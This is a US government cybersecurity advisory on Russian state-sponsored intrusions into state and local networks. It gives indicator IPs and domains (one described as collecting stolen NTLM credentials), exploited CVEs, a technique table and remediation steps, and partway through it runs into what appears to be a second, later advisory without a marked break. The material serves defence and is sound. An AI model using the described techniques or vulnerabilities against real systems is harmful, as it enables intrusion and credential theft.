The APT actor also hosted malicious domains, including possible aviation sector target `columbusairports.microsoftonline[.]host`, which resolved to `108.177.235[.]92` and `[cityname].westus2.cloudapp.azure.com`; these domains are U.S. registered and are likely SLTT government targets (_Drive-By Compromise _[[T1189](<https://attack.mitre.org/versions/v7/techniques/T1189>)]).\n\nThe APT actor scanned for vulnerable Citrix and Microsoft Exchange services and identified vulnerable systems, likely for future exploitation. This actor continues to exploit a Citrix Directory Traversal Bug ([CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>)) and a Microsoft Exchange remote code execution flaw ([CVE-2020-0688](<https://nvd.nist.gov/vuln/detail/CVE-2020-0688>)).\n\nThe APT actor has been observed using Cisco AnyConnect Secure Socket Layer (SSL) virtual private network (VPN) connections to enable remote logins on at least one victim network, possibly enabled by an Exim Simple Mail Transfer Protocol (SMTP) vulnerability ([CVE 2019-10149](<https://nvd.nist.gov/vuln/detail/CVE-2019-10149>)) (_External Remote Services_ [[T1133](<https://attack.mitre.org/versions/v7/techniques/T1133>)]). More recently, the APT actor enumerated and exploited a Fortinet VPN vulnerability ([CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>)) for Initial Access [[TA0001](<https://attack.mitre.org/versions/v7/tactics/TA0001/>)] and a Windows Netlogon vulnerability ([CVE-2020-1472](<https://nvd.nist.gov/vuln/detail/CVE-2020-1472>)) to obtain access to Windows Active Directory (AD) servers for Privilege Escalation [[TA0004](<https://attack.mitre.org/versions/v7/tactics/TA0004/>)] within the network (_Valid Accounts_ [[T1078](<https://attack.mitre.org/versions/v7/techniques/T1078>)]). 
These vulnerabilities can also be leveraged to compromise other devices on the network (_Lateral Movement_ [[TA0008](<https://attack.mitre.org/versions/v7/tactics/TA0008/>)]) and to maintain _Persistence_ [[TA0003](<https://attack.mitre.org/versions/v7/tactics/TA0003/>)]).\n\nBetween early February and mid-September, these APT actors used `213.74.101[.]65`, `212.252.30[.]170`, `5.196.167[.]184`, `37.139.7[.]16`, `149.56.20[.]55`, `91.227.68[.]97`, and `5.45.119[.]124` to target U.S. SLTT government networks. Successful authentications\u2014including the compromise of Microsoft Office 365 (O365) accounts\u2014have been observed on at least one victim network (_Valid Accounts_ [[T1078](<https://attack.mitre.org/versions/v7/techniques/T1078>)]).\n\n### Mitigations\n\n#### Indicators of Compromise\n\nThe APT actor used the following IP addresses and domains to carry out its objectives:\n\n * `213.74.101[.]65`\n * `213.74.139[.]196`\n * `212.252.30[.]170`\n * `5.196.167[.]184`\n * `37.139.7[.]16`\n * `149.56.20[.]55`\n * `91.227.68[.]97`\n * `138.201.186[.]43`\n * `5.45.119[.]124`\n * `193.37.212[.]43`\n * `146.0.77[.]60`\n * `51.159.28[.]101`\n * `columbusairports.microsoftonline[.]host`\n * `microsoftonline[.]host`\n * `email.microsoftonline[.]services`\n * `microsoftonline[.]services`\n * `cityname[.]westus2.cloudapp.azure.com`\n\nIP address `51.159.28[.]101` appears to have been configured to receive stolen Windows New Technology Local Area Network Manager (NTLM) credentials. FBI and CISA recommend organizations take defensive actions to mitigate the risk of leaking NTLM credentials; specifically, organizations should disable NTLM or restrict outgoing NTLM. 
Organizations should consider blocking IP address `51.159.28[.]101` (although this action alone may not mitigate the threat, as the APT actor has likely established, or will establish, additional infrastructure points).

Organizations should check available logs for traffic to/from IP address `51.159.28[.]101` for indications of credential-harvesting activity. As the APT actors likely have, or will, establish additional infrastructure points, organizations should also monitor for Server Message Block (SMB) or WebDAV activity leaving the network to other IP addresses.

Refer to AA20-296A.stix for a downloadable copy of IOCs.

#### Network Defense-in-Depth

Proper network defense-in-depth and adherence to information security best practices can assist in mitigating the threat and reducing the risk to critical infrastructure. The following guidance may assist organizations in developing network defense procedures.

 * Keep all applications updated according to vendor recommendations, and especially prioritize updates for external facing applications and remote access services to address CVE-2019-19781, CVE-2020-0688, CVE-2019-10149, CVE-2018-13379, and CVE-2020-1472. Refer to table 1 for patch information on these CVEs.

_Table 1: Patch information for CVEs_

**Vulnerability** | **Vulnerable Products** | **Patch Information**
---|---|---
[CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>) | Citrix Application Delivery Controller; Citrix Gateway; Citrix SDWAN WANOP | [Citrix blog post: firmware updates for Citrix ADC and Citrix Gateway versions 11.1 and 12.0](<https://www.citrix.com/blogs/2020/01/19/vulnerability-update-first-permanent-fixes-available-timeline-accelerated/>); [Citrix blog post: security updates for Citrix SD-WAN WANOP release 10.2.6 and 11.0.3](<https://www.citrix.com/blogs/2020/01/22/update-on-cve-2019-19781-fixes-now-available-for-citrix-sd-wan-wanop/>); [Citrix blog post: firmware updates for Citrix ADC and Citrix Gateway versions 12.1 and 13.0](<https://www.citrix.com/blogs/2020/01/23/fixes-now-available-for-citrix-adc-citrix-gateway-versions-12-1-and-13-0/>); [Citrix blog post: firmware updates for Citrix ADC and Citrix Gateway version 10.5](<https://www.citrix.com/blogs/2020/01/24/citrix-releases-final-fixes-for-cve-2019-19781/>)
[CVE-2020-0688](<https://nvd.nist.gov/vuln/detail/CVE-2020-0688>) | Microsoft Exchange Server 2010 Service Pack 3 Update Rollup 30; Microsoft Exchange Server 2013 Cumulative Update 23; Microsoft Exchange Server 2016 Cumulative Update 14; Microsoft Exchange Server 2016 Cumulative Update 15; Microsoft Exchange Server 2019 Cumulative Update 3; Microsoft Exchange Server 2019 Cumulative Update 4 | [Microsoft Security Advisory for CVE-2020-0688](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0688>)
[CVE-2019-10149](<https://nvd.nist.gov/vuln/detail/CVE-2019-10149>) | Exim versions 4.87–4.91 | [Exim page for CVE-2019-10149](<https://www.exim.org/static/doc/security/CVE-2019-10149.txt>)
[CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>) | FortiOS 6.0: 6.0.0 to 6.0.4; FortiOS 5.6: 5.6.3 to 5.6.7; FortiOS 5.4: 5.4.6 to 5.4.12 | [Fortinet Security Advisory: FG-IR-18-384](<https://www.fortiguard.com/psirt/FG-IR-18-384>)
[CVE-2020-1472](<https://nvd.nist.gov/vuln/detail/CVE-2020-1472>) | Windows Server 2008 R2 for x64-based Systems Service Pack 1; Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation); Windows Server 2012; Windows Server 2012 (Server Core installation); Windows Server 2012 R2; Windows Server 2016; Windows Server 2019; Windows Server 2019 (Server Core installation); Windows Server, version 1903 (Server Core installation); Windows Server, version 1909 (Server Core installation); Windows Server, version 2004 (Server Core installation) | [Microsoft Security Advisory for CVE-2020-1472](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472>)

 * Follow Microsoft’s [guidance](<https://support.microsoft.com/en-us/help/4557222/how-to-manage-the-changes-in-netlogon-secure-channel-connections-assoc>) on monitoring logs for activity related to the Netlogon vulnerability, CVE-2020-1472.
 * If appropriate for your organization’s network, prevent external communication of all versions of SMB and related protocols at the network boundary by blocking Transmission Control Protocol (TCP) ports 139 and 445 and User Datagram Protocol (UDP) port 137. See the CISA publication on [SMB Security Best Practices](<https://us-cert.cisa.gov/ncas/current-activity/2017/01/16/SMB-Security-Best-Practices>) for more information.
 * Implement the prevention, detection, and mitigation strategies outlined in:
    * CISA Alert [TA15-314A – Compromised Web Servers and Web Shells – Threat Awareness and Guidance](<https://us-cert.cisa.gov/ncas/alerts/TA15-314A>).
    * National Security Agency Cybersecurity Information Sheet [U/OO/134094-20 – Detect and Prevent Web Shells Malware](<https://www.nsa.gov/News-Features/News-Stories/Article-View/Article/2159419/detect-prevent-cyber-attackers-from-exploiting-web-servers-via-web-shell-malware/>).
 * Isolate external facing services in a network demilitarized zone (DMZ), since they are more exposed to malicious activity; enable robust logging, and monitor the logs for signs of compromise.
 * Establish a training mechanism to inform end users on proper email and web usage, highlighting current information and analysis and including common indicators of phishing. End users should have clear instructions on how to report unusual or suspicious emails.
 * Implement application controls to only allow execution from specified application directories. System administrators may implement this through Microsoft Software Restriction Policy, AppLocker, or similar software. Safe defaults allow applications to run from the `PROGRAMFILES`, `PROGRAMFILES(X86)`, and `WINDOWS` folders. All other locations should be disallowed unless an exception is granted.
 * Block Remote Desktop Protocol (RDP) connections originating from untrusted external addresses unless an exception exists; routinely review exceptions for validity.

#### Comprehensive Account Resets

For accounts where NTLM password hashes or Kerberos tickets may have been compromised (e.g., through CVE-2020-1472), a double-password-reset may be required in order to prevent continued exploitation of those accounts.
For domain-admin-level credentials, a reset of KRB-TGT “Golden Tickets” may be required, and Microsoft has released specialized [guidance](<https://docs.microsoft.com/en-us/azure-advanced-threat-protection/domain-dominance-alerts>) for this. Such a reset should be performed very carefully if needed.

If there is an observation of [CVE-2020-1472](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472>) Netlogon activity or other indications of valid credential abuse, it should be assumed the APT actors have compromised AD administrative accounts. In such cases, the AD forest should not be fully trusted, and, therefore, a new forest should be deployed. Existing hosts from the old compromised forest cannot be migrated in without being rebuilt and rejoined to the new domain, but migration may be done through “creative destruction,” wherein, as endpoints in the legacy forest are decommissioned, new ones can be built in the new forest. This will need to be completed in on-premises as well as Azure-hosted AD instances.

Note that fully resetting an AD forest is difficult and complex; it is best done with the assistance of personnel who have successfully completed the task previously.

It is critical to perform a full password reset on all user and computer accounts in the AD forest. Use the following steps as a guide.

 1. Create a temporary administrator account, and use this account only for all administrative actions.
 2. Reset the Kerberos Ticket Granting Ticket (`krbtgt`) password;[[1](<https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/manage/ad-forest-recovery-resetting-the-krbtgt-password>)] this must be completed before any additional actions (a second reset will take place in step 5).
 3. Wait for the `krbtgt` reset to propagate to all domain controllers (time may vary).
 4. Reset all account passwords (passwords should be 15 characters or more and randomly assigned):
    1. User accounts (forced reset with no legacy password reuse)
    2. Local accounts on hosts (including local accounts not covered by Local Administrator Password Solution [LAPS])
    3. Service accounts
    4. Directory Services Restore Mode (DSRM) account
    5. Domain Controller machine account
    6. Application passwords
 5. Reset the `krbtgt` password again.
 6. Wait for the `krbtgt` reset to propagate to all domain controllers (time may vary).
 7. Reboot domain controllers.
 8. Reboot all endpoints.

The following accounts should be reset:

 * AD Kerberos Authentication Master (2x)
 * All Active Directory Accounts
 * All Active Directory Admin Accounts
 * All Active Directory Service Accounts
 * All Active Directory User Accounts
 * DSRM Account on Domain Controllers
 * Non-AD Privileged Application Accounts
 * Non-AD Unprivileged Application Accounts
 * Non-Windows Privileged Accounts
 * Non-Windows User Accounts
 * Windows Computer Accounts
 * Windows Local Admin

#### VPN Vulnerabilities

Implement the following recommendations to secure your organization’s VPNs:

 * **Update VPNs, network infrastructure devices, and devices** being used to remote into work environments with the latest software patches and security configurations. See CISA Tips [Understanding Patches and Software Updates](<https://us-cert.cisa.gov/ncas/tips/ST04-006>) and [Securing Network Infrastructure Devices](<https://us-cert.cisa.gov/ncas/tips/ST18-001>). Wherever possible, enable automatic updates.
 * **Implement MFA on all VPN connections to increase security**. Physical security tokens are the most secure form of MFA, followed by authenticator app-based MFA. SMS and email-based MFA should only be used when no other forms are available. If MFA is not implemented, require teleworkers to use strong passwords. See CISA Tips [Choosing and Protecting Passwords](<https://us-cert.cisa.gov/ncas/tips/ST04-002>) and [Supplementing Passwords](<https://us-cert.cisa.gov/ncas/tips/ST05-012>) for more information.

Discontinue unused VPN servers. Reduce your organization’s attack surface by discontinuing unused VPN servers, which may act as a point of entry for attackers. To protect your organization against VPN vulnerabilities:

 * **Audit** configuration and patch management programs.
 * **Monitor** network traffic for unexpected and unapproved protocols, especially outbound to the Internet (e.g., Secure Shell [SSH], SMB, RDP).
 * **Implement** MFA, especially for privileged accounts.
 * **Use** separate administrative accounts on separate administration workstations.
 * **Keep** [software up to date](<https://us-cert.cisa.gov/ncas/tips/ST04-006>). Enable automatic updates, if available.

### Contact Information

To report suspicious or criminal activity related to information found in this Joint Cybersecurity Advisory, contact your local FBI field office at [www.fbi.gov/contact-us/field](<http://www.fbi.gov/contact-us/field>), or the FBI’s 24/7 Cyber Watch (CyWatch) at (855) 292-3937 or by e-mail at [CyWatch@fbi.gov](<mailto:CyWatch@fbi.gov>). When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact. To request incident response resources or technical assistance related to these threats, contact CISA at [Central@cisa.dhs.gov](<mailto:Central@cisa.dhs.gov>).

### Resources

 * APT Actors Chaining Vulnerabilities Against SLTT, Critical Infrastructure, and Elections Organizations – <https://us-cert.cisa.gov/ncas/alerts/aa20-283a>
 * CISA Activity Alert CVE-2019-19781 – <https://us-cert.cisa.gov/ncas/alerts/aa20-031a>
 * CISA Vulnerability Bulletin – <https://us-cert.cisa.gov/ncas/bulletins/SB19-161>
 * CISA Current Activity – <https://us-cert.cisa.gov/ncas/current-activity/2020/03/10/unpatched-microsoft-exchange-servers-vulnerable-cve-2020-0688>
 * Citrix Directory Traversal Bug (CVE-2019-19781) – <https://nvd.nist.gov/vuln/detail/CVE-2019-19781>
 * Microsoft Exchange remote code execution flaw (CVE-2020-0688) – <https://nvd.nist.gov/vuln/detail/CVE-2020-0688>
 * CVE-2018-13379 – <https://nvd.nist.gov/vuln/detail/CVE-2018-13379>
 * CVE-2020-1472 – <https://nvd.nist.gov/vuln/detail/CVE-2020-1472>
 * CVE-2019-10149 – <https://nvd.nist.gov/vuln/detail/CVE-2019-10149>
 * NCCIC/US-CERT Alert TA15-314A – Compromised Web Servers and Web Shells – Threat Awareness and Guidance – <https://us-cert.cisa.gov/ncas/alerts/TA15-314A>
 * NCCIC/US-CERT publication on SMB Security Best Practices – <https://us-cert.cisa.gov/ncas/current-activity/2017/01/16/SMB-Security-Best-Practices>

**_DISCLAIMER_**

_This information is provided "as is" for informational purposes only. The United States Government does not provide any warranties of any kind regarding this information.
In no event shall the United States Government or its contractors or subcontractors be liable for any damages, including but not limited to, direct, indirect, special or consequential damages, arising out of, resulting from, or in any way connected with this information, whether or not based upon warranty, contract, tort, or otherwise, whether or not arising out of negligence, and whether or not injury was sustained from, or arose out of the results of, or reliance upon the information._

_The United States Government does not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply their endorsement, recommendation, or favoring by the United States Government._

### References

[[1] Microsoft: AD Forest Recovery - Resetting the krbtgt password](<https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/manage/ad-forest-recovery-resetting-the-krbtgt-password>)

### Revisions

 * October 22, 2020: Initial Version
 * November 17, 2020: Added U.S. Heat Map of Activity
 * December 1, 2020: Added "current as of" date to U.S. Heat Map of Activity

_Source: CISA Alert AA20-296A, "Russian State-Sponsored Advanced Persistent Threat Actor Compromises U.S. Government Targets" (record dated 2020-12-01), <https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-296a>. CVEs referenced: CVE-2018-13379, CVE-2019-10149, CVE-2019-19781, CVE-2020-0688, and CVE-2020-1472._

### Summary

**Actions Critical Infrastructure Organizations Should Implement to Immediately Strengthen Their Cyber Posture.**

 * Patch all systems. Prioritize patching [known exploited vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>).
 * Implement [multi-factor authentication](<https://us-cert.cisa.gov/ncas/tips/ST05-012>).
 * Use antivirus software.
 * Develop internal contact lists and surge support.

_**Note:** this advisory uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK®) framework, version 10.
See the [ATT&CK for Enterprise](<https://attack.mitre.org/versions/v9/techniques/enterprise/>) for all referenced threat actor tactics and techniques._

This joint Cybersecurity Advisory (CSA), authored by the Cybersecurity and Infrastructure Security Agency (CISA), Federal Bureau of Investigation (FBI), and National Security Agency (NSA), is part of our continuing cybersecurity mission to warn organizations of cyber threats and help the cybersecurity community reduce the risk presented by these threats. This CSA provides an overview of Russian state-sponsored cyber operations; commonly observed tactics, techniques, and procedures (TTPs); detection actions; incident response guidance; and mitigations. This overview is intended to help the cybersecurity community reduce the risk presented by these threats.

CISA, the FBI, and NSA encourage the cybersecurity community, especially critical infrastructure network defenders, to adopt a heightened state of awareness and to conduct proactive threat hunting, as outlined in the Detection section. Additionally, CISA, the FBI, and NSA strongly urge network defenders to implement the recommendations listed below and detailed in the Mitigations section. These mitigations will help organizations improve their functional resilience by reducing the risk of compromise or severe business degradation.

 1. **Be prepared**. Confirm reporting processes and minimize personnel gaps in IT/OT security coverage. Create, maintain, and exercise a cyber incident response plan, resilience plan, and continuity of operations plan so that critical functions and operations can be kept running if technology systems are disrupted or need to be taken offline.
 2. **Enhance your organization’s cyber posture**. Follow best practices for identity and access management, protective controls and architecture, and vulnerability and configuration management.
 3. **Increase organizational vigilance**. Stay current on reporting on this threat. [Subscribe](<https://public.govdelivery.com/accounts/USDHSCISA/subscriber/new?qsp=CODE_RED>) to CISA’s [mailing list and feeds](<https://www.cisa.gov/uscert/mailing-lists-and-feeds>) to receive notifications when CISA releases information about a security topic or threat.

CISA, the FBI, and NSA encourage critical infrastructure organization leaders to review CISA Insights: [Preparing for and Mitigating Cyber Threats](<https://cisa.gov/sites/default/files/publications/CISA_INSIGHTS-Preparing_For_and_Mitigating_Potential_Cyber_Threats-508C.pdf>) for information on reducing cyber threats to their organization.

### Technical Details

Historically, Russian state-sponsored advanced persistent threat (APT) actors have used common but effective tactics, including spearphishing, brute force, and exploiting known vulnerabilities against accounts and networks with weak security, to gain initial access to target networks. Vulnerabilities known to be exploited by Russian state-sponsored APT actors for initial access include:

 * [CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>) FortiGate VPNs
 * [CVE-2019-1653](<https://nvd.nist.gov/vuln/detail/CVE-2019-1653>) Cisco router
 * [CVE-2019-2725](<https://nvd.nist.gov/vuln/detail/CVE-2019-2725>) Oracle WebLogic Server
 * [CVE-2019-7609](<https://nvd.nist.gov/vuln/detail/CVE-2019-7609>) Kibana
 * [CVE-2019-9670](<https://nvd.nist.gov/vuln/detail/CVE-2019-9670>) Zimbra software
 * [CVE-2019-10149](<https://nvd.nist.gov/vuln/detail/CVE-2019-10149>) Exim Simple Mail Transfer Protocol
 * [CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>) Pulse Secure
 * [CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>) Citrix
 * [CVE-2020-0688](<https://nvd.nist.gov/vuln/detail/CVE-2020-0688>) Microsoft Exchange
 * [CVE-2020-4006](<https://nvd.nist.gov/vuln/detail/CVE-2020-4006>) VMware (note: this was a zero-day at the time)
 * [CVE-2020-5902](<https://nvd.nist.gov/vuln/detail/CVE-2020-5902>) F5 Big-IP
 * [CVE-2020-14882](<https://nvd.nist.gov/vuln/detail/CVE-2020-14882>) Oracle WebLogic
 * [CVE-2021-26855](<https://nvd.nist.gov/vuln/detail/CVE-2021-26855>) Microsoft Exchange (note: this vulnerability is frequently observed used in conjunction with [CVE-2021-26857](<https://nvd.nist.gov/vuln/detail/CVE-2021-26857>), [CVE-2021-26858](<https://nvd.nist.gov/vuln/detail/CVE-2021-26858>), and [CVE-2021-27065](<https://nvd.nist.gov/vuln/detail/CVE-2021-27065>))

Russian state-sponsored APT actors have also demonstrated sophisticated tradecraft and cyber capabilities by compromising third-party infrastructure, compromising third-party software, or developing and deploying custom malware. The actors have also demonstrated the ability to maintain persistent, undetected, long-term access in compromised environments, including cloud environments, by using legitimate credentials.

In some cases, Russian state-sponsored cyber operations against critical infrastructure organizations have specifically targeted operational technology (OT)/industrial control systems (ICS) networks with destructive malware. See the following advisories and alerts for information on historical Russian state-sponsored cyber-intrusion campaigns and customized malware that have targeted ICS:

 * ICS Advisory [ICS Focused Malware – Havex](<https://us-cert.cisa.gov/ics/advisories/ICSA-14-178-01>)
 * ICS Alert [Ongoing Sophisticated Malware Campaign Compromising ICS (Update E)](<https://us-cert.cisa.gov/ics/alerts/ICS-ALERT-14-281-01B>)
 * ICS Alert [Cyber-Attack Against Ukrainian Critical Infrastructure](<https://us-cert.cisa.gov/ics/alerts/IR-ALERT-H-16-056-01>)
 * Technical Alert [CrashOverride Malware](<https://us-cert.cisa.gov/ncas/alerts/TA17-163A>)
 * CISA MAR [HatMan: Safety System Targeted Malware (Update B)](<https://us-cert.cisa.gov/ics/MAR-17-352-01-HatMan-Safety-System-Targeted-Malware-Update-B>)
 * CISA ICS Advisory [Schneider Electric Triconex Tricon (Update B)](<https://us-cert.cisa.gov/ics/advisories/ICSA-18-107-02>)

Russian state-sponsored APT actors have used sophisticated cyber capabilities to target a variety of U.S. and international critical infrastructure organizations, including those in the Defense Industrial Base as well as the Healthcare and Public Health, Energy, Telecommunications, and Government Facilities Sectors. High-profile cyber activity publicly attributed to Russian state-sponsored APT actors by U.S. government reporting and legal actions includes:

 * **Russian state-sponsored APT actors targeting state, local, tribal, and territorial (SLTT) governments and aviation networks, September 2020, through at least December 2020.** Russian state-sponsored APT actors targeted dozens of SLTT government and aviation networks. The actors successfully compromised networks and exfiltrated data from multiple victims.
 * **Russian state-sponsored APT actors’ global Energy Sector intrusion campaign, 2011 to 2018.** These Russian state-sponsored APT actors conducted a multi-stage intrusion campaign in which they gained remote access to U.S. and international Energy Sector networks, deployed ICS-focused malware, and collected and exfiltrated enterprise and ICS-related data.
 * **Russian state-sponsored APT actors’ campaign against Ukrainian critical infrastructure, 2015 and 2016.** Russian state-sponsored APT actors conducted a cyberattack against Ukrainian energy distribution companies, leading to multiple companies experiencing unplanned power outages in December 2015. The actors deployed [BlackEnergy](<https://attack.mitre.org/versions/v10/software/S0089>) malware to steal user credentials and used its destructive malware component, KillDisk, to make infected computers inoperable. In 2016, these actors conducted a cyber-intrusion campaign against a Ukrainian electrical transmission company and deployed [CrashOverride](<https://attack.mitre.org/versions/v10/software/S0604>) malware specifically designed to attack power grids.

For more information on recent and historical Russian state-sponsored malicious cyber activity, see the referenced products below or [cisa.gov/Russia](<https://www.cisa.gov/uscert/russia>).

 * Joint FBI-DHS-CISA CSA [Russian Foreign Intelligence Service (SVR) Cyber Operations: Trends and Best Practices for Network Defenders](<https://us-cert.cisa.gov/ncas/alerts/aa21-116a>)
 * Joint NSA-FBI-CISA CSA [Russian GRU Conducting Global Brute Force Campaign to Compromise Enterprise and Cloud Environments](<https://media.defense.gov/2021/jul/01/2002753896/-1/-1/1/CSA_GRU_GLOBAL_BRUTE_FORCE_CAMPAIGN_UOO158036-21.PDF>)
 * Joint FBI-CISA CSA [Russian State-Sponsored Advanced Persistent Threat Actor Compromises U.S. Government Targets](<https://www.cisa.gov/uscert/ncas/alerts/aa20-296a>)
 * Joint CISA-FBI CSA [APT Actors Chaining Vulnerabilities against SLTT, Critical Infrastructure, and Elections Organizations](<https://www.cisa.gov/uscert/ncas/alerts/aa20-283a>)
 * CISA’s webpage [Remediating Networks Affected by the SolarWinds and Active Directory/M365 Compromise](<https://us-cert.cisa.gov/remediating-apt-compromised-networks>)
 * CISA Alert [Russian Government Cyber Activity Targeting Energy Sector and Other Critical Infrastructure Sectors](<https://us-cert.cisa.gov/ncas/alerts/TA18-074A>)
 * CISA ICS Alert: [Cyber-Attack Against Ukrainian Critical Infrastructure](<https://us-cert.cisa.gov/ics/alerts/ir-alert-h-16-056-01>)

Table 1 provides common, publicly known TTPs employed by Russian state-sponsored APT actors, which map to the MITRE ATT&CK for Enterprise framework, version 10. **Note:** these lists are not intended to be all inclusive.
Russian state-sponsored actors have modified their TTPs before based on public reporting.[[1](<https://www.ncsc.gov.uk/news/joint-advisory-further-ttps-associated-with-svr-cyber-actors>)] Therefore, CISA, the FBI, and NSA anticipate the Russian state-sponsored actors may modify their TTPs as they deem necessary to reduce their risk of detection.

_Table 1: Common Tactics and Techniques Employed by Russian State-Sponsored APT Actors_

Tactic | Technique | Procedure
---|---|---
Reconnaissance [[TA0043](<https://attack.mitre.org/versions/v10/tactics/TA0043/>)] | Active Scanning: Vulnerability Scanning [[T1595.002](<https://attack.mitre.org/versions/v10/techniques/T1595/002/>)] | Russian state-sponsored APT actors have performed large-scale scans in an attempt to find vulnerable servers.
Reconnaissance [[TA0043](<https://attack.mitre.org/versions/v10/tactics/TA0043/>)] | Phishing for Information [[T1598](<https://attack.mitre.org/versions/v10/techniques/T1598>)] | Russian state-sponsored APT actors have conducted spearphishing campaigns to gain credentials of target networks.
Resource Development [[TA0042](<https://attack.mitre.org/versions/v10/tactics/TA0042/>)] | Develop Capabilities: Malware [[T1587.001](<https://attack.mitre.org/versions/v10/techniques/T1587/001>)] | Russian state-sponsored APT actors have developed and deployed malware, including ICS-focused destructive malware.
Initial Access [[TA0001](<https://attack.mitre.org/versions/v10/tactics/TA0001/>)] | Exploit Public-Facing Application [[T1190](<https://attack.mitre.org/versions/v10/techniques/T1190/>)] | Russian state-sponsored APT actors use publicly known vulnerabilities, as well as zero-days, in internet-facing systems to gain access to networks.
Initial Access [[TA0001](<https://attack.mitre.org/versions/v10/tactics/TA0001/>)] | Supply Chain Compromise: Compromise Software Supply Chain [[T1195.002](<https://attack.mitre.org/versions/v10/techniques/T1195/002>)] | Russian state-sponsored APT actors have gained initial access to victim organizations by compromising trusted third-party software. Notable incidents include M.E.Doc accounting software and SolarWinds Orion.
Execution [[TA0002](<https://attack.mitre.org/versions/v10/tactics/TA0002>)] | Command and Scripting Interpreter: PowerShell [[T1059.003](<https://attack.mitre.org/versions/v10/techniques/T1059/003>)] and Windows Command Shell [[T1059.003](<https://attack.mitre.org/versions/v10/techniques/T1059/003>)] | Russian state-sponsored APT actors have used `cmd.exe` to execute commands on remote machines. They have also used PowerShell to create new tasks on remote machines, identify configuration settings, exfiltrate data, and execute other commands.
Persistence [[TA0003](<https://attack.mitre.org/versions/v10/tactics/TA0003>)] | Valid Accounts [[T1078](<https://attack.mitre.org/versions/v10/techniques/T1078/>)] | Russian state-sponsored APT actors have used credentials of existing accounts to maintain persistent, long-term access to compromised networks.
Credential Access [[TA0006](<https://attack.mitre.org/versions/v10/tactics/TA0006>)] | Brute Force: Password Guessing [[T1110.001](<https://attack.mitre.org/versions/v10/techniques/T1110/001>)] and Password Spraying [[T1110.003](<https://attack.mitre.org/versions/v10/techniques/T1110/003>)] | Russian state-sponsored APT actors have conducted brute-force password guessing and password spraying campaigns.
Credential Access [[TA0006](<https://attack.mitre.org/versions/v10/tactics/TA0006>)] | OS Credential Dumping: NTDS [[T1003.003](<https://attack.mitre.org/versions/v10/techniques/T1003/003/>)] | Russian state-sponsored APT actors have exfiltrated credentials and exported copies of the Active Directory database `ntds.dit`.
Credential Access [[TA0006](<https://attack.mitre.org/versions/v10/tactics/TA0006>)] | Steal or Forge Kerberos Tickets: Kerberoasting [[T1558.003](<https://attack.mitre.org/versions/v10/techniques/T1558/003/>)] | Russian state-sponsored APT actors have performed “Kerberoasting,” whereby they obtained the Ticket Granting Service (TGS) tickets for Active Directory Service Principal Names (SPNs) for offline cracking.
Credential Access [[TA0006](<https://attack.mitre.org/versions/v10/tactics/TA0006>)] | Credentials from Password Stores [[T1555](<https://attack.mitre.org/versions/v10/techniques/T1555>)] | Russian state-sponsored APT actors have used previously compromised account credentials to attempt to access Group Managed Service Account (gMSA) passwords.
Credential Access [[TA0006](<https://attack.mitre.org/versions/v10/tactics/TA0006>)] | Exploitation for Credential Access [[T1212](<https://attack.mitre.org/versions/v10/techniques/T1212>)] | Russian state-sponsored APT actors have exploited the Windows Netlogon vulnerability [CVE-2020-1472](<https://nvd.nist.gov/vuln/detail/CVE-2020-1472>) to obtain access to Windows Active Directory servers.
Credential Access [[TA0006](<https://attack.mitre.org/versions/v10/tactics/TA0006>)] | Unsecured Credentials: Private Keys [[T1552.004](<https://attack.mitre.org/versions/v10/techniques/T1552/004>)] | Russian state-sponsored APT actors have obtained private encryption keys from the Active Directory Federation Services (ADFS) container to decrypt corresponding SAML signing certificates.
Command and Control [[TA0011](<https://attack.mitre.org/versions/v10/tactics/TA0011/>)] | Proxy: Multi-hop Proxy [[T1090.003](<https://attack.mitre.org/versions/v10/techniques/T1090/003/>)] | Russian state-sponsored APT actors have used virtual private servers (VPSs) to route traffic to targets. The actors often use VPSs with IP addresses in the home country of the victim to hide activity among legitimate user traffic.
For additional enterprise TTPs used by Russian state-sponsored APT actors, see the ATT&CK for Enterprise pages on [APT29](<https://attack.mitre.org/versions/v10/groups/G0016>), [APT28](<https://attack.mitre.org/versions/v10/groups/G0007>), and the [Sandworm Team](<https://attack.mitre.org/versions/v10/groups/G0034>). For information on ICS TTPs, see the [ATT&CK for ICS](<https://collaborate.mitre.org/attackics/index.php/Main_Page>) pages on the [Sandworm Team](<https://collaborate.mitre.org/attackics/index.php/Group/G0007>), [BlackEnergy 3](<https://collaborate.mitre.org/attackics/index.php/software/S0004>) malware, [CrashOverride](<https://collaborate.mitre.org/attackics/index.php/software/S0001>) malware, BlackEnergy’s [KillDisk](<https://collaborate.mitre.org/attackics/index.php/software/S0016>) component, and [NotPetya](<https://collaborate.mitre.org/attackics/index.php/software/S0006>) malware.

### Detection

Given Russian state-sponsored APT actors’ demonstrated capability to maintain persistent, long-term access in compromised enterprise and cloud environments, CISA, the FBI, and NSA encourage all critical infrastructure organizations to:

 * **Implement robust log collection and retention.** Without a centralized log collection and monitoring capability, organizations have limited ability to investigate incidents or detect the threat actor behavior described in this advisory. Depending on the environment, examples include:
   * Native tools such as M365’s Sentinel.
